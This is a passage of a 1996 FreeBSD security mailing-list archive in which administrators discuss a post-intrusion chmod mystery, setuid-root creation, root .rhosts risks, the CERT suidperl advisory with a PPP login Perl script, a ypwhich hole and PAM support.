18:27:58 -0400 (EDT)) Subject: Re: Odd permission changes Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >>>>> "Troy" == Troy Arie Cobb writes: Troy> I need to buy a clue, any help? Look through the user crontab files in /var/cron/tabs/* and look for suspect entries. If you don't find any, you might also want to check for an at job that requeues itself, so look through /var/at/jobs/*. And if you still don't find anything, look for long running processes or cyclicly executing processes that eventually do a bunch of chmods at 2 week intervals. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Wed Jun 26 16:26:30 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA02492 for security-outgoing; Wed, 26 Jun 1996 16:26:30 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA02481 for ; Wed, 26 Jun 1996 16:26:28 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id QAA11247; Wed, 26 Jun 1996 16:28:01 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id QAA21948; Wed, 26 Jun 1996 16:26:24 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: Troy Arie Cobb cc: security@freebsd.org Subject: Re: Odd permission changes In-reply-to: Your message of "Wed, 26 Jun 1996 18:27:58 PDT." Date: Wed, 26 Jun 1996 16:26:23 PDT Message-ID: <21946.835831583@waldrog.cs.uidaho.edu> From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Troy Arie Cobb wrote... I have a strange thing that's been happening regularly now, following an incident w/ a cracker-type (who is now long gone). Now, on Fridays, around 2am, all of the owner-execute permissions on all files is removed. This has happened two weeks in a row now, I have accounting active and saw the chmod, but no one was logged in, and the daily/weekly scripts don't have any chmods in them. What about binaries, like `cron' or `at' or `chmod'? Have they been tampered with? Do you run any unusual daemons? Any incorrect crontab/at jobs? What happens when you do `chmod 000 /bin/chmod' (note: be sure to have a copy of chmod from another machine w/ permissions to fix /bin/chmod before you try this!) ? I need to buy a clue, any help? If you find out, please let me/us know. I've never seen that before. From owner-freebsd-security Wed Jun 26 16:48:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA03499 for security-outgoing; Wed, 26 Jun 1996 16:48:37 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA03489 for ; Wed, 26 Jun 1996 16:48:32 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id TAA07325; Wed, 26 Jun 1996 19:44:20 -0400 (EDT) Date: Wed, 26 Jun 1996 19:45:14 -0400 (EDT) From: Brian Tao To: Thomas Ptacek cc: FREEBSD-SECURITY-L Subject: Re: How secure is FreeBSD 2.1 right after install? (fwd) In-Reply-To: <199606262256.RAA00837@enteract.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 26 Jun 1996, Thomas Ptacek wrote: > > 8.7.4's got exploitable problems in it... they're just not public > knowledge yet. People *are* running around with scripts for it. It's not public knowledge, yet there are people out there with exploit scripts. I assume this situation came about because the holes haven't been fixed in 8.7.5 yet? If they have, then there is no reason to publically disseminate the exploits. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Wed Jun 26 18:26:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA10861 for security-outgoing; Wed, 26 Jun 1996 18:26:55 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA10854 for ; Wed, 26 Jun 1996 18:26:51 -0700 (PDT) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id KAA08033; Thu, 27 Jun 1996 10:43:13 +0930 From: Michael Smith Message-Id: <199606270113.KAA08033@genesis.atrad.adelaide.edu.au> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Thu, 27 Jun 1996 10:43:12 +0930 (CST) Cc: security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.n In-Reply-To: from "-Vince-" at Jun 26, 96 01:55:05 pm MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -Vince- stands accused of saying: > > > > Well, *if* that's true, it still wouldn't be setuid root just from the > > transfer. He'd *still* have to get root some other way to make this > > binary setuid root. > > > > But if he's going to do that, why bother copying a binary over the > > network -- it would just be easier to just snag a copy of your own > > /bin/sh and mark it setuid root. > > Hmmm, what happens if he tars it first and then sends it over? Vince, you are, like, _spectacularly_ dim. Tar is a program. It reads datafiles, and writes new files based on what it reads. It is not magic. If it reads a tarfile that tells it to create a setuid root file, it will try to do so. Note that about half a dozen people have said _very_plainly_ that to create or make a setuid root file one _must_already_be_root_. Or am I just wasting my ulcer on you? > Vince -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Wed Jun 26 18:32:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA11161 for security-outgoing; Wed, 26 Jun 1996 18:32:47 -0700 (PDT) Received: from zap.zap.qc.ca ([192.219.247.20]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA11156 for ; Wed, 26 Jun 1996 18:32:44 -0700 (PDT) Received: (from fortin@localhost) by zap.zap.qc.ca (8.7.5/8.7.3) id VAA14466; Wed, 26 Jun 1996 21:32:39 -0400 (EDT) Date: Thu, 27 Jun 1996 03:32:38 +0200 (MDT) From: Denis Fortin Reply-To: fortin@acm.org To: Brian Tao cc: Thomas Ptacek , FREEBSD-SECURITY-L Subject: Re: How secure is FreeBSD 2.1 right after install? (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 26 Jun 1996, Brian Tao wrote: > On Wed, 26 Jun 1996, Thomas Ptacek wrote: > > 8.7.4's got exploitable problems in it... they're just not public > > knowledge yet. People *are* running around with scripts for it. > > It's not public knowledge, yet there are people out there with > exploit scripts. I assume this situation came about because the holes > haven't been fixed in 8.7.5 yet? If they have, then there is no > reason to publically disseminate the exploits. 8.7.5 is a very minor update over 8.7.4 that gets around a tiny bug that could cause network connections to hang. If there's a hole in 8.7.4, I fully expect 8.7.5 to also exhibit it. Denis, sigh... PS. What this world needs is a really simple smtpd From owner-freebsd-security Wed Jun 26 20:21:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA17770 for security-outgoing; Wed, 26 Jun 1996 20:21:49 -0700 (PDT) Received: from MindBender.HeadCandy.com (root@[199.238.225.168]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA17760; Wed, 26 Jun 1996 20:21:42 -0700 (PDT) Received: from localhost.HeadCandy.com (michaelv@localhost.HeadCandy.com [127.0.0.1]) by MindBender.HeadCandy.com (8.7.5/8.7.3) with SMTP id UAA01884; Wed, 26 Jun 1996 20:21:07 -0700 (PDT) Message-Id: <199606270321.UAA01884@MindBender.HeadCandy.com> X-Authentication-Warning: MindBender.HeadCandy.com: Host michaelv@localhost.HeadCandy.com [127.0.0.1] didn't use HELO protocol To: -Vince- cc: "Eric J. Schwertfeger" , Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of Wed, 26 Jun 96 13:55:05 -0700. Date: Wed, 26 Jun 1996 20:21:02 -0700 From: "Michael L. VanLoon -- HeadCandy.com" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >> > It was a remote login so he had to transfer it over somehow... >> Well, *if* that's true, it still wouldn't be setuid root just from the >> transfer. He'd *still* have to get root some other way to make this >> binary setuid root. >> But if he's going to do that, why bother copying a binary over the >> network -- it would just be easier to just snag a copy of your own >> /bin/sh and mark it setuid root. > Hmmm, what happens if he tars it first and then sends it over? Try it. :-) That's the only way to figure all this stuff out... Seriously, you must be root to create a setuid root file. It doesn't matter *how* you try to create it. ----------------------------------------------------------------------------- Michael L. VanLoon michaelv@HeadCandy.com --< Free your mind and your machine -- NetBSD free un*x >-- NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3, Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32... NetBSD ports in progress: PICA, others... Roll your own Internet access -- Seattle People's Internet cooperative. If you're in the Seattle area, ask me how. ----------------------------------------------------------------------------- From owner-freebsd-security Thu Jun 27 00:14:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA06681 for security-outgoing; Thu, 27 Jun 1996 00:14:36 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA06673 for ; Thu, 27 Jun 1996 00:14:29 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id JAA25584; Thu, 27 Jun 1996 09:14:12 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606270714.JAA25584@gvr.win.tue.nl> Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) To: scanner@orion.webspan.net (Scanner) Date: Thu, 27 Jun 1996 09:14:12 +0200 (MET DST) Cc: taob@io.org, freebsd-security@freebsd.org In-Reply-To: from Scanner at "Jun 26, 96 06:40:56 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Scanner wrote: > On Thu, 27 Jun 1996, Guido van Rooij wrote: > > > Brian Tao wrote: > > [There is text before PGP section.] > > > I believe this applies to perl4 as shipped with all versions of > > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > > the actual vulnerability is? > > > > We know. This bug was first reported by Paul Traina to CERT. > > Of course we're not going to get into details. > Ok sure fine take all the fun out of it. :-) > The fun is not reading how it is done, but finding it ;-) -Guido From owner-freebsd-security Thu Jun 27 01:39:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA10327 for security-outgoing; Thu, 27 Jun 1996 01:39:25 -0700 (PDT) Received: from proxy.siemens.at (proxy.siemens.at [192.138.228.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA10273; Thu, 27 Jun 1996 01:38:11 -0700 (PDT) Received: from sol1.gud.siemens.co.at (sol-f.gud.siemens-austria) by proxy.siemens.at with SMTP id AA12438 (5.67a/IDA-1.5); Thu, 27 Jun 1996 10:37:21 +0200 Received: from ws2301.gud.siemens.co.at by sol1.gud.siemens.co.at with smtp (Smail3.1.28.1 #7 for ) id m0uZCZZ-00020FC; Thu, 27 Jun 96 10:37 MET DST Received: by ws2301.gud.siemens.co.at (1.37.109.16/1.37) id AA158394572; Thu, 27 Jun 1996 10:36:12 +0200 From: "Hr.Ladavac" Message-Id: <199606270836.AA158394572@ws2301.gud.siemens.co.at> Subject: Re: I need help on this one - please help me track this guy down! To: michaelv@HeadCandy.com (Michael L. VanLoon -- HeadCandy.com) Date: Thu, 27 Jun 1996 10:36:11 +0200 (MESZ) Cc: vince@mercury.gaianet.net, ejs@bfd.com, mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: <199606270321.UAA01884@MindBender.HeadCandy.com> from "Michael L. VanLoon -- HeadCandy.com" at Jun 26, 96 08:21:02 pm X-Mailer: ELM [version 2.4 PL24 ME8a] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk In his e-mail Michael L. VanLoon -- HeadCandy.com wrote: > > > >> > It was a remote login so he had to transfer it over somehow... > > >> Well, *if* that's true, it still wouldn't be setuid root just from the > >> transfer. He'd *still* have to get root some other way to make this > >> binary setuid root. > >> But if he's going to do that, why bother copying a binary over the > >> network -- it would just be easier to just snag a copy of your own > >> /bin/sh and mark it setuid root. > > > Hmmm, what happens if he tars it first and then sends it over? > > Try it. :-) That's the only way to figure all this stuff out... > > Seriously, you must be root to create a setuid root file. It doesn't > matter *how* you try to create it. A five dollar question Vince: does root have .rhosts in his home directory? What is to be found there? If he does, throw it away; it's enormously insecure. Similar with /etc/host.equiv et cetera. /Marino From owner-freebsd-security Thu Jun 27 04:40:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA19808 for security-outgoing; Thu, 27 Jun 1996 04:40:25 -0700 (PDT) Received: from irs.inf.tu-dresden.de (irs.inf.tu-dresden.de [141.76.1.17]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA19731 for ; Thu, 27 Jun 1996 04:39:35 -0700 (PDT) Received: by irs.inf.tu-dresden.de (8.6.12/8.6.12-s1) id NAA10077; Thu, 27 Jun 1996 13:37:47 +0200 Date: Thu, 27 Jun 1996 13:37:47 +0200 Message-Id: <199606271137.NAA10077@irs.inf.tu-dresden.de> To: guido@gvr.win.tue.nl (Guido van Rooij) Cc: freebsd-security@FreeBSD.ORG, bugs@sax.sax.de In-reply-to: guido@gvr.win.tue.nl's message of Thu, 27 Jun 1996 00:06:49 +0200 (MET DST) Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) From: hohmuth@inf.tu-dresden.de (Michael Hohmuth) References: <199606261914.NAA05459@rocky.mt.sri.com> <199606262206.AAA24375@gvr.win.tue.nl> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In article <199606262206.AAA24375@gvr.win.tue.nl> guido@gvr.win.tue.nl (Guido van Rooij) writes: > Nate Williams wrote: > > > I believe this applies to perl4 as shipped with all versions of > > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > > the actual vulnerability is? > > > > I don't, but thanks for bringing this up. I was planning on bringing > > this in but I forgot. I just applied the suggested change to the > > version of perl in -stable and -current, so it'll be in 2.1.5. > > > > We already were no longer vulnerable. Howver, the applied fix won;t hurt. When the advisory appeared, I applied the fix (fixsuid4-0.pat) to our 2.1.0 system. However, afterwards our PPP login script ceased to work, so I had to back out the patch. The login script (used as the login shell for our PPP accounts) just said: Can't open perl script "/dev/fd/3//usr/local/sbin/ppplogin": Not a directory I'll append a copy of the script below for those interested. Can anyone shed some light on what was going on? I understand from Guido's post that 2.1.0 is not vulnerable even if the Perl4 patch has not been allpied. Is this correct? If this is the case, I suggest backing out the patch from -stable and -current as well. Thanks in advance, Michael -- Email: hohmuth@inf.tu-dresden.de WWW: http://www.inf.tu-dresden.de/~mh1/ ------------------------------------------------------------------------------ #!/usr/bin/suidperl # # # login script for PPP logins # $ENV{'PATH'} = "/bin:/usr/bin:/sbin:/usr/sbin"; # # Q: how to check if the fork succeeded? # A: ask Larry Wall :-/ # open(LOG, "|-") || exec "logger", "-p", "local0.debug"; if(open(SLHOST, "/etc/sliphome/slip.hosts") == 0) { print LOG "Cannot open /etc/sliphome/slip.hosts\n"; close LOG; exit 1; } if(!defined($ENV{'USER'})) { print LOG "PPP login with unknown \${USER}\n"; close LOG; exit 1; } $user = $ENV{'USER'}; $sluser = $user; $sluser =~ s/^pp/sl/; while() { next if /^([ \t]*\#.*)?$/; ($login,$local,$remote,$mask) = split; last if $login eq $sluser; } close(SLHOST); if($local eq "" || $remote eq "" || $mask eq "" || $login ne $sluser) { print LOG "PPP login for user $user, required information not found\n"; close LOG; exit 1; } print LOG "$user ($sluser/$login) attached, $local -> $remote, mask $mask\n"; $local = &convaddr($local); $remote = &convaddr($remote); $mask = &convaddr($mask); print LOG "$user attached, $local -> $remote, mask $mask\n"; close LOG; exec "pppd", "crtscts", "modem", "$local:$remote", "netmask", "$mask"; # should not be reached at all open(LOG, "|-") || exec "logger", "-p", "local0.debug"; print LOG "exec of pppd failed for user $user\n"; close(LOG); exit 2; # # convert address to dotted quad # sub convaddr { local($input) = @_; local($ip,$a,$b,$c,$d); # return if already dotted quad return $input if $input =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/; if($input =~ /^0[xX]/) { $ip = oct($input); return sprintf("%d.%d.%d.%d", ($ip >> 24) & 0xff, ($ip >> 16) & 0xff, ($ip >> 8) & 0xff, $ip & 0xff); } # neither dotted quad, nor hex number, ask the name server ($name,$aliases,$addrtype,$length,$addr) = gethostbyname($input); ($a,$b,$c,$d) = unpack("C4",$addr); return "$a.$b.$c.$d"; } From owner-freebsd-security Thu Jun 27 05:04:18 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA20962 for security-outgoing; Thu, 27 Jun 1996 05:04:18 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA20922 for ; Thu, 27 Jun 1996 05:04:01 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id OAA25884; Thu, 27 Jun 1996 14:03:18 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606271203.OAA25884@gvr.win.tue.nl> Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) To: hohmuth@inf.tu-dresden.de (Michael Hohmuth) Date: Thu, 27 Jun 1996 14:03:17 +0200 (MET DST) Cc: freebsd-security@FreeBSD.ORG, bugs@sax.sax.de In-Reply-To: <199606271137.NAA10077@irs.inf.tu-dresden.de> from Michael Hohmuth at "Jun 27, 96 01:37:47 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Can anyone shed some light on what was going on? > > I understand from Guido's post that 2.1.0 is not vulnerable even if > the Perl4 patch has not been allpied. Is this correct? > > If this is the case, I suggest backing out the patch from -stable and > -current as well. > 2.1.0 IS vulnerable!!!!! 2.1.0-current and stable are not vulnerable anymore. That is what I was trying to say. So All official releases that had working suidperl *are* vulnerable. As soon as Paul is back from his trip I'm sure he will post an appropriate advisory. -Guido From owner-freebsd-security Thu Jun 27 07:39:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA01532 for security-outgoing; Thu, 27 Jun 1996 07:39:35 -0700 (PDT) Received: from maki.wwa.com (maki.wwa.com [198.49.174.21]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA01523 for ; Thu, 27 Jun 1996 07:39:31 -0700 (PDT) Received: from wendigo.trans.sni-usa.com by maki.wwa.com with smtp (Smail3.1.29.1 #1) id m0uZIE4-000rLjC; Thu, 27 Jun 96 09:39 CDT Received: from vogon.trans.sni-usa.com (vogon [136.157.83.215]) by wendigo.trans.sni-usa.com (8.7.5/8.6.12) with ESMTP id JAA21545; Thu, 27 Jun 1996 09:34:23 -0500 (CDT) Received: from shyam.trans.sni-usa.com (shyam.trans.sni-usa.com [136.157.82.43]) by vogon.trans.sni-usa.com (8.6.12/8.6.12) with SMTP id JAA10329; Thu, 27 Jun 1996 09:47:05 -0500 From: hal@snitt.com (Hal Snyder) To: Troy Arie Cobb Cc: security@freebsd.org Subject: Re: Odd permission changes Date: Thu, 27 Jun 1996 14:39:34 GMT Organization: Siemens Nixdorf Transportation Technologies Message-ID: <31d29c6e.3939041@vogon.trans.sni-usa.com> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 26 Jun 1996 18:27:58 -0400 (EDT), you wrote: > I have a strange thing that's been happening regularly now, > following an incident w/ a cracker-type (who is now long > gone). Now, on Fridays, around 2am, all of the owner-execute > permissions on all files is removed. This has happened two > weeks in a row now, I have accounting active and saw the > chmod, but no one was logged in, and the daily/weekly scripts > don't have any chmods in them. If searches of cron and at tables don't help, I'd hack the kernel to track chmod calls to syslog, including timestamp, real userid, and program name. From owner-freebsd-security Thu Jun 27 11:34:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA15765 for security-outgoing; Thu, 27 Jun 1996 11:34:17 -0700 (PDT) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA15760; Thu, 27 Jun 1996 11:34:11 -0700 (PDT) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id LAA05468; Thu, 27 Jun 1996 11:30:17 -0700 From: Terry Lambert Message-Id: <199606271830.LAA05468@phaeton.artisoft.com> Subject: Re: I need help on this one - please help me track this guy down! To: lada@ws2301.gud.siemens.co.at (Hr.Ladavac) Date: Thu, 27 Jun 1996 11:30:17 -0700 (MST) Cc: michaelv@HeadCandy.com, vince@mercury.gaianet.net, ejs@bfd.com, mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: <199606270836.AA158394572@ws2301.gud.siemens.co.at> from "Hr.Ladavac" at Jun 27, 96 10:36:11 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > Seriously, you must be root to create a setuid root file. It doesn't > > matter *how* you try to create it. > > A five dollar question Vince: > > does root have .rhosts in his home directory? What is to be found there? > If he does, throw it away; it's enormously insecure. Similar with > /etc/host.equiv et cetera. man ruserok The authentication for vouchsafe protocols (rcmd/rsh based protocols) *specifically* ignores hosts.equiv and hosts.lpd for root. If root does not have a .rhosts, then it is secure from vouchsafe attack this way. Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Thu Jun 27 14:00:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA25502 for security-outgoing; Thu, 27 Jun 1996 14:00:40 -0700 (PDT) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA25496 for ; Thu, 27 Jun 1996 14:00:37 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.7.5/8.6.10) with SMTP id OAA14831 for freebsd-security@freebsd.org; Thu, 27 Jun 1996 14:00:32 -0700 (PDT) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199606272100.OAA14831@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: Host localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@orca.gov.bc.ca X-Mailer: DXmail To: freebsd-security@freebsd.org Subject: Ypwhich Hole Date: Thu, 27 Jun 96 14:00:32 -0700 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk There's been a little discussion about a ypwhich hole under FreeBSD 2.1.0R. In order to plug the hole as quickly and as easily as possible, for the moment, would replacing the 2.1.0 version of ypwhich with the one in current fix the problem or does the problem exist in a library or in the kernel? Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Thu Jun 27 14:17:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA26580 for security-outgoing; Thu, 27 Jun 1996 14:17:20 -0700 (PDT) Received: from naughty.monkey.org ([141.211.26.102]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA26575 for ; Thu, 27 Jun 1996 14:17:16 -0700 (PDT) Received: from localhost (dugsong@localhost) by naughty.monkey.org (8.7.5/8.7.5) with SMTP id RAA03733 for ; Thu, 27 Jun 1996 17:18:10 -0400 (EDT) Date: Thu, 27 Jun 1996 17:18:09 -0400 (EDT) From: Douglas Song To: freebsd-security@freebsd.org Subject: pluggable authentication modules Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Is any work being done on implementing PAM (pluggable authentication modules) for FreeBSD? I already know of some people in the Linux camp that are working on it. I would like to help code this, if anyone's interested. More information on PAM is available from the OSF RFC 86.0, or at http://fangorn.ncsa.uiuc.edu/faq/motif.faq.034.html --- Douglas Song, one angry monkey. dugsong@monkey.org From owner-freebsd-security Thu Jun 27 16:02:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA04942 for security-outgoing; Thu, 27 Jun 1996 16:02:59 -0700 (PDT) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA04929 for ; Thu, 27 Jun 1996 16:02:55 -0700 (PDT) Received: (from root@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id QAA00298; Thu, 27 Jun 1996 16:02:15 -0700 Date: Thu, 27 Jun 1996 16:02:10 -0700 (PDT) From: Steve Reid To: Guido van Rooij cc: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) In-Reply-To: <199606271203.OAA25884@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > 2.1.0 IS vulnerable!!!!! > 2.1.0-current and stable are not vulnerable anymore. I'm using FreeBSD 2.1.0-RELEASE. Is it sufficent to remove the suid bit from the suidperl binaries? Or do I also have to search for scripts with the suid bit? I don't currently need suid perl scripts. ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve@edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) From owner-freebsd-security Thu Jun 27 16:43:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA07540 for security-outgoing; Thu, 27 Jun 1996 16:43:03 -0700 (PDT) Received: from haven.uniserve.com (haven.uniserve.com [198.53.215.121]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA07533 for ; Thu, 27 Jun 1996 16:42:58 -0700 (PDT) Received: by haven.uniserve.com id <31879-4095>; Thu, 27 Jun 1996 16:46:19 -0800 Date: Thu, 27 Jun 1996 16:46:11 -0700 (PDT) From: Tom Samplonius To: cschuber@orca.gov.bc.ca cc: freebsd-security@freebsd.org Subject: Re: Ypwhich Hole In-Reply-To: <199606272100.OAA14831@passer.osg.gov.bc.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 27 Jun 1996, Cy Schubert - ITSD Open Systems Group wrote: > There's been a little discussion about a ypwhich hole under FreeBSD 2.1.0R. In > order to plug the hole as quickly and as easily as possible, for the moment, > would replacing the 2.1.0 version of ypwhich with the one in current fix the > problem or does the problem exist in a library or in the kernel? > > > Regards, Phone: (604)389-3827 > Cy Schubert OV/VM: BCSC02(CSCHUBER) > Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET > ITSD Internet: cschuber@uumail.gov.bc.ca > cschuber@bcsc02.gov.bc.ca > > "Quit spooling around, JES do it." > > As far as I know, this problem has never been announced on this list, nor has a security advisory been issued. current's yp code has extensive changes. ypwhich may not compile. Tom From owner-freebsd-security Thu Jun 27 16:46:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA07706 for security-outgoing; Thu, 27 Jun 1996 16:46:10 -0700 (PDT) Received: from maelstrom.Berkeley.EDU (maelstrom-ether.Berkeley.EDU [128.32.191.86]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA07701 for ; Thu, 27 Jun 1996 16:46:06 -0700 (PDT) Received: (from mconst@localhost) by 